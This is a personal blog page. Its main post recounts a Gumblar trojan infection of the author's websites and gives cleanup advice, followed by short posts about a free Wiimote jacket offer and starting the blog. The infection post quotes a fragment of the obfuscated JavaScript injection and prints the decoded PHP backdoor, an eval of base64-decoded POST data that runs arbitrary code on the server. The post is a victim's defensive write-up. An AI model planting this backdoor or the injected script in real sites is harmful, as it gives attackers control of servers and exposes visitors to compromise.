May 27



Ouch, some of my sites were attacked by exploit, and blacklisted by Google.
What it does is injecting malicious codes into .html, .php, .aspx and .js files, usually some snippet of javascript in the header right before the body tag in .html and .aspx files, and at the bottom of the .php and .js files. It will also generate a image.php and gifimg.php file in the images directory. It will do so randomly anywhere on the website. PC users visiting the site could be compromised.
First thing to do is to change ftp password, a stronger password would help. Then it takes me a long time to scrub through the sites, using scripts, search and replace, delete, ftp, to find and delete those scripts, and then about a day for Google to review the site again. Linux really help in this case in cleaning it up through command line, but not so with PC servers, where each file have to be checked manually.

Some analysis…
Here is one sample of the various injections :
var maV3C='%';var nW5R='var"20a"3d"22Scri"70t"45"6eg"69ne"22"2cb"3d"22Ver"73ion()+"22"2cj"3d"22"22"2c"75"3dn"61vig"61tor

This is the backdoor script in the image.php or gifimg.php file :

When decoded, here is the actual php script :
if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo ‘36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61′;

As you can see, it can run any php commands through that file on your server.

Here are a list of links related to the Gumblar trojan :
Gumblar explode across the Web
Beware of the Gumblar Worm
PHP exploit on the loose
12 Facts about the Gumblar Exploit
Removal and Prevention of Gumblar

Hope this helps.
What a pain… and 2 days wasted for no reason.

Jan 21

Wiimote Jacket

I don’t think this is widely publicized, because I did not know about it until yesterday.

All new Nintendo Wii now comes with Wiimote Jacket, but they are extending the offer to those existing users. If you do not have a Wiimote Jacket, go ahead and click here :

All they need is your Wii’s serial number, register online, and they will send you up to 4 jackets, free of charge!!

I have seen and tried these jackets, they actually looks and feels better then the ones I’ve just bought!!

Here is another blog about it :

Jun 15

Trying this iTheme from

May 02

The beginning lookOkay, just to see how far I can customize this blog, I want to keep a view of the starting point.

May 02

I could never find the time nor incentives to build my own webpage.

However, I have a need to look into Blog software, and so here it is, my personal blog is born.

I have heard so much good things about WordPress, but I could not believe how simple it is to use.

Let’s see where this will take me.

FireStats iconPowered by FireStats